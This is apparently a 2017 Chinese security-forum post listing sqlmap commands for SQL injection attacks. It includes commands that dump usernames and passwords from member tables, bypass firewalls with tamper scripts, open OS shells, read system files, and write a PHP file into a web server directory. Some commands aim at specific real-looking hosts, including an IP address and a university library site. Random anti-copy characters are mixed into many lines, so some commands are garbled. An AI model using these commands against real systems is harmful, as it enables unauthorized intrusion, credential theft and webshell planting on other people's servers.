找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1851|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
$ y4 X) f1 t2 {% M! \' z
/ J* f& _' H& |) I" Y4 f6 Uupdate :::::>     in the folder   after  execute    following   order : svn update& e, L6 j, x* k+ _8 g) n4 f

" n. V2 @: o. N0 I) C" fsqlmap.py -r 1.txt --current-db
2 X1 k. C5 i3 a  |' S
' \+ y4 X$ a# M8 ^; z% n8 `6 }v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
' n& z$ z& z0 F1 _  _. [
1 R- q  G: Z2 C==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 5 C4 g. o$ Z* z  a' j$ s0 H
猜解数据库8 f# W) J4 J. a
./sqlmap.py -u "injection-url" --dbs1 p) l, n7 U# y% S0 _. p1 u: V$ ~! N
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
* v5 i0 \0 n% I6 S6 g" M; r) w+ G3 e. @4 l# E
猜解表名
! s$ G& E4 j0 x./sqlmap.py -u "injection-url" -D database_name --tables/ O( ]( S& w2 V' x1 Y

; x# F9 E% ]. g2 dsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"; _  S' f" q3 n/ N; x! c
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" & D6 i7 ?, A2 m( g% v2 X% F

: U2 ?# D# }) dsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump* c# B1 ^9 I* r3 c9 n

" D3 R# i- g) {; Z; Fsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
. H/ d8 {1 m3 s1 `" g4 U" Dsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
! Z$ h, V$ k+ ssqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"   n6 G4 s0 [* N7 @
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"2 r3 N* w( q. Z! C' X2 b* \* m- D

" i9 t0 `0 [0 l1 |0 Csqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
) V3 b! i1 d* N3 |sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"' I" t% J+ t8 b* p
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
: w( O* Z) ^' ?4 t8 Bsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
8 x1 c* G- L# w7 K5 [& Tsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
8 o$ l7 G# ]9 u: I6 X- ~8 f3 O# I! [7 A6 f( ^( S/ H# W
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
! M& L# w. k- d( |  K' e  [; H, u( esqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"& H' Z9 {5 m- ?2 G7 t: l+ C  B

3 G) \) Q% H6 @7 q2 Qsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
2 r- O; \: i$ k( \% d0 P' P. E猜解列名
& n& a/ L; j0 B6 M1 E5 Q  D./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
  F0 J6 |0 l3 L2 Z4 b1 @1 K* Z, Y1 h" B& g
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" - u, t. u1 E! H) r7 r+ J" Q* k2 D
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 8 U' J# |7 P3 f# I* z$ I* E- t! k
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
! H0 }; `0 H, |6 A8 B: o* |5 L5 j3 ^7 _& j! T# S
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
1 _( N" Y2 c+ B/ S& X. i+ _; [8 }&submit=Go' W; b* F7 l/ [7 y0 D# l" Z
猜解值
1 k! G7 A* C, P3 d./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump& L1 c* i/ f: Z! |$ h
========================================================
$ W3 j- u, Z6 p3 l0 x; }7 ~搜索表名中包括mana字符的
3 y1 D# z/ U0 g) o' o/sqlmap.py -u "injection-url" -T mana --search
4 l3 K) G5 ?8 m; R0 H4 W返回一个交互式sql shell
6 Q! t) Z7 `2 Q* j/ j/sqlmap.py -u "injection-url" --sql-shell
! V+ [6 {: w% L$ X" B% H; K读取指定文件(需权限): t0 _3 }3 k" T
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
* |/ W# v+ G: p5 P6 T+ t1 f) `0 E查看当前 用户 及 数据库 7 }. r3 ^* a1 r8 B" Z+ Y" b: g0 R
/sqlmap.py -u "injection-url" --current-user --current-db$ n8 B# ]2 `* K% s+ p2 g
本地文件 写入 远程目标绝对路径
* b1 v% l0 T* }% A1 w$ d/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
6 g) H8 H" E- P8 d! @sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
% D+ [& h. k. R2 t4 i0 w( f5 m; \8 I+ `
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径/ x3 I( w+ M( z/ d6 J$ j
查看某用的权限
1 Q7 r5 V: j& S5 \* o: A: A4 P/sqlmap.py -u "injection-url" --privileges -U root& S8 d3 q. X3 V* I
查看当前用户是否为dba
' |4 ?- ?7 u* E# p& @* o3 L% `0 Z# s: G4 y/sqlmap.py -u "injection-url" --is-dba
- l) j" ^$ `5 b( o2 m6 ?0 D4 Y读取所有数据库用户或指定数据库用户的密码/ M. ~+ M2 ?3 Z4 H  Y( c( u- T
sqlmap.py -r 1.txt --users --passwords& o& y% x" |. V' _& X' k7 R
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
; |+ A" Q" Q8 Q- u# S6 j8 s$ ]5 d7 r! n# A
/sqlmap.py -u "injection-url" --passwords -U root
* {' t8 s( g9 O; F& w- k
5 Y% N" g7 j1 F: q& ^8 z. k* S--start&&--stop 与 --first&&--last 的区别
1 M/ X9 `1 ]4 L- b: T( n5 }/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
4 \+ H) r) s$ O7 B, X- E' t1 p+ F9 w! N
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
8 X! I8 \+ W* `1 z% I+ e  l/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
+ o7 j$ }( f! m# ^4 _8 P( ^/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns% ?  z* n% \# _

- n3 g* n3 s! ]& E1 u# P1 S0 D5 `执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
, m: m& ^1 f5 Y; }9 z; E/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
1 h+ H' ^) X6 z5 t( B6 i
% i- |9 ^% {/ v. w* _* p: H8 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表